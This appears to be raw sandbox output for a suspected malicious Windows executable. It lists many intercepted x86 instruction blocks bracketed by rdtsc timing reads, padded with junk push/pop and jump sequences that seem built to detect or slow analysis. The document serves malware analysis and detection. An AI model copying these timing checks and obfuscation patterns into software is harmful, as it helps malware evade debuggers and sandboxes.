Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D30C95 second address: D30CE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 je 00007FFBBCAD7286h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FFBBCAD7288h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d mov ecx, dword ptr [ebp+122D2B81h] 0x00000033 push 148537A4h 0x00000038 je 00007FFBBCAD72A4h 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D30DFD second address: D30E39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FFBBCD95546h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jo 00007FFBBCD95552h 0x00000015 jns 00007FFBBCD9554Ch 0x0000001b nop 0x0000001c mov dword ptr [ebp+122D19C7h], edi 0x00000022 mov cx, ax 0x00000025 push 00000000h 0x00000027 sub dword ptr [ebp+122D2FBBh], ebx 0x0000002d push 51D264B4h 0x00000032 pushad 0x00000033 push ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D30E39 second address: D30E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFBBCAD7294h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D30E54 second address: D30F18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 51D26434h 0x0000000e mov cl, al 0x00000010 add ecx, 47742F8Fh 0x00000016 push 00000003h 0x00000018 sub edx, dword ptr [ebp+122D2A5Dh] 0x0000001e push 00000000h 0x00000020 jnp 00007FFBBCD9554Eh 0x00000026 push 00000003h 0x00000028 or edi, dword ptr [ebp+122D2AD1h] 0x0000002e mov ecx, eax 0x00000030 call 00007FFBBCD95549h 0x00000035 jbe 00007FFBBCD9555Ch 0x0000003b pushad 0x0000003c jmp 00007FFBBCD95552h 0x00000041 push esi 0x00000042 pop esi 0x00000043 popad 0x00000044 push eax 0x00000045 jnl 00007FFBBCD9555Dh 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f pushad 0x00000050 jmp 00007FFBBCD9554Eh 0x00000055 jmp 00007FFBBCD95558h 0x0000005a popad 0x0000005b mov eax, dword ptr [eax] 0x0000005d jbe 00007FFBBCD95552h 0x00000063 jbe 00007FFBBCD9554Ch 0x00000069 jnc 00007FFBBCD95546h 0x0000006f mov dword ptr [esp+04h], eax 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D30F18 second address: D30F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D30F1F second address: D30F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBBCD9554Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D30F31 second address: D30F7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 call 00007FFBBCAD7299h 0x0000000e mov dword ptr [ebp+122D3195h], edi 0x00000014 pop edx 0x00000015 lea ebx, dword ptr [ebp+12452972h] 0x0000001b sub dx, FF7Ch 0x00000020 xchg eax, ebx 0x00000021 jno 00007FFBBCAD7292h 0x00000027 push eax 0x00000028 pushad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D50243 second address: D5026D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FFBBCD95553h 0x00000008 pop esi 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FFBBCD9554Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D50569 second address: D5056F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D5056F second address: D5058D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBBCD95546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBBCD95550h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D506D2 second address: D506D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D506D8 second address: D506E2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBBCD95546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D506E2 second address: D506FA instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFBBCAD7292h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D506FA second address: D5070F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBBCD95551h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D509AC second address: D509B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D509B2 second address: D509C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007FFBBCD95546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D50B21 second address: D50B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jng 00007FFBBCAD729Ch 0x0000000d jmp 00007FFBBCAD7296h 0x00000012 pop ecx 0x00000013 jp 00007FFBBCAD72B2h 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007FFBBCAD7286h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D50B53 second address: D50B65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D50B65 second address: D50B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D5112B second address: D51139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D51139 second address: D5116A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFBBCAD728Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FFBBCAD728Eh 0x00000012 push edx 0x00000013 pop edx 0x00000014 jmp 00007FFBBCAD7292h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D45117 second address: D4511B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D5129D second address: D512A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D512A3 second address: D512B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95551h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D512B8 second address: D512E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jne 00007FFBBCAD7295h 0x0000000f jmp 00007FFBBCAD728Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FFBBCAD7286h 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D518F5 second address: D518FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D518FD second address: D51902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D51902 second address: D51934 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007FFBBCD95546h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFBBCD9554Eh 0x0000001b jo 00007FFBBCD9554Eh 0x00000021 pushad 0x00000022 popad 0x00000023 jng 00007FFBBCD95546h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D51D3B second address: D51D70 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFBBCAD7299h 0x00000008 jmp 00007FFBBCAD728Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FFBBCAD7286h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D51D70 second address: D51D96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FFBBCD95555h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D58FCC second address: D58FE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D58FE9 second address: D58FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D579E5 second address: D579EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D591A5 second address: D591A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D591A9 second address: D591BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBBCAD728Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D5E65F second address: D5E66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FFBBCD95552h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D5E66C second address: D5E68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FFBBCAD7286h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFBBCAD7296h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D25F6E second address: D25F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D5DB7C second address: D5DB85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D5DFAC second address: D5DFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBBCD9554Ch 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jp 00007FFBBCD9554Eh 0x00000012 pushad 0x00000013 jbe 00007FFBBCD95546h 0x00000019 jnl 00007FFBBCD95546h 0x0000001f jno 00007FFBBCD95546h 0x00000025 popad 0x00000026 pushad 0x00000027 push edi 0x00000028 pop edi 0x00000029 jmp 00007FFBBCD95556h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D5EF0C second address: D5EF10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D5EF10 second address: D5EF49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FFBBCD95546h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007FFBBCD9554Dh 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007FFBBCD9554Eh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 pop edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D5F063 second address: D5F067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D5FB05 second address: D5FB2A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFBBCD95556h 0x00000008 jmp 00007FFBBCD95550h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 jns 00007FFBBCD95546h 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D5FB2A second address: D5FB30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D5FB30 second address: D5FB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D5FCA5 second address: D5FCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D5FCA9 second address: D5FCBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FFBBCD95548h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D60095 second address: D6009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6009B second address: D600A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D600A0 second address: D600AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FFBBCAD7286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6017E second address: D60185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D60F2B second address: D60F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D60F31 second address: D60F35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D61862 second address: D61866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D62111 second address: D62198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FFBBCD95546h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FFBBCD95548h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 pushad 0x0000002a pushad 0x0000002b or ecx, 4790F431h 0x00000031 adc ebx, 19D263A6h 0x00000037 popad 0x00000038 mov edx, dword ptr [ebp+122D2A95h] 0x0000003e popad 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007FFBBCD95548h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 0000001Ch 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b push 00000000h 0x0000005d push eax 0x0000005e pushad 0x0000005f push esi 0x00000060 jc 00007FFBBCD95546h 0x00000066 pop esi 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FFBBCD9554Fh 0x0000006e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D62198 second address: D6219C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D63623 second address: D63629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D63629 second address: D6362D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6335E second address: D63376 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFBBCD9554Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6362D second address: D6363C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6363C second address: D63646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FFBBCD95546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D63646 second address: D6364A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D64BC9 second address: D64BD6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D64BD6 second address: D64BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D65726 second address: D65730 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFBBCD95546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D65730 second address: D6574A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jl 00007FFBBCAD728Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6574A second address: D657BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push eax 0x00000009 call 00007FFBBCD95548h 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc eax 0x0000001c push eax 0x0000001d ret 0x0000001e pop eax 0x0000001f ret 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007FFBBCD95548h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c jns 00007FFBBCD9554Ch 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 pushad 0x00000046 push esi 0x00000047 jc 00007FFBBCD95546h 0x0000004d pop esi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FFBBCD95559h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D657BF second address: D657C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D65F62 second address: D65F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6998E second address: D699A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FFBBCAD7293h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D65F66 second address: D65F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6A76B second address: D6A76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6A76F second address: D6A7CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov bx, 888Ch 0x0000000d push 00000000h 0x0000000f sub dword ptr [ebp+122D31A8h], edx 0x00000015 mov ebx, ecx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FFBBCD95548h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov bh, D8h 0x00000035 xchg eax, esi 0x00000036 pushad 0x00000037 pushad 0x00000038 jmp 00007FFBBCD95555h 0x0000003d jnp 00007FFBBCD95546h 0x00000043 popad 0x00000044 push eax 0x00000045 push edx 0x00000046 push esi 0x00000047 pop esi 0x00000048 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6A7CA second address: D6A7EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jp 00007FFBBCAD72A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFBBCAD7294h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6A7EE second address: D6A7F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6C827 second address: D6C840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBBCAD728Bh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
